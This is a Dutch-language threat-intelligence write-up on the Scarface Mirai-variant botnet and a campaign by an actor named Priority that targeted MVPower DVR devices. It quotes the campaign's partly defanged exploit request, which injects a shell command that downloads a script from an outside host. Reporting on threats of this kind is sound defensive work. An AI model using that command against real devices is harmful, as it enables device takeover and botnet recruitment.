Scarface Botnet

Wanneer de broncode van een malwarebedreiging wordt gelekt of door de ontwikkelaars zelf aan het publiek wordt vrijgegeven, kunnen zelfs niet-zo ervaren bedreigingsactoren deze gebruiken, aanpassingen maken om beter aan hun behoeften te voldoen en deze in het wild los te laten. Dit exacte gedrag is meerdere keren gedetecteerd sinds de code van het beruchte Mirai Botnet in 2016 op hackerforums werd gepubliceerd.

Een bedreigingsacteur die zichzelf identificeert als Priority zit achter een aanvalscampagne met twee verschillende Mirai-varianten. De eerste payload die het gebruikte, was gebaseerd op de Demonbot Mirai-variant en was specifiek gericht op Hadoop-aanvallen. De tweede payload die later in de campagne wordt aangenomen, is veel geavanceerder en is gebaseerd op de Mirai-variant die is ontwikkeld door Scarface. Scarface is een bekende malware-ontwikkelaar die de Mirai-code nam en probeerde deze gemakkelijker toegankelijk te maken voor beginnende hackers, terwijl hij ook de dreiging aanpaste om Internet of Things (IoT) -apparaten te infecteren.

De Priority-campagne richt zich op het scannen van verschillende poorten - 500, 5501, 5502, 5050 en 60001, en ze aan te vallen met een enkele opdracht met de 'GET / shell? Cd% 20 / tmp;% 20wget% 20http: // 45 ( .) 13.58.4 / TPJ.sh; opdracht. Volgens de infosec-analisten die de Priority-campagne hebben geanalyseerd, lijkt de aanvaller een specifiek doel voor ogen te hebben, omdat het zich primair richt op de 60001-poort, terwijl de andere vier meer als afleiding dienen dan iets anders. Bovendien bepaalden ze dat Priority nogal onervaren moest zijn, wat blijkt uit het feit dat slechts één kwetsbaarheid werd uitgebuit als een compromisvector: MVPower DVR Shell Unauthenticated Command Execution, in plaats van het gebruikelijke aantal tussen 3 en 7 exploits die in andere soortgelijke gevaren.

Alle aanvankelijke aanvallen werden uitgevoerd door een enkel IP-adres dat werd gehost op een Virtual Private Server (VPS) van Digital Ocean. Hackers nemen vaak hun toevlucht tot VPS vanwege de flexibiliteit die ze bieden bij het snel opzetten van een server en het vervolgens even snel opschonen.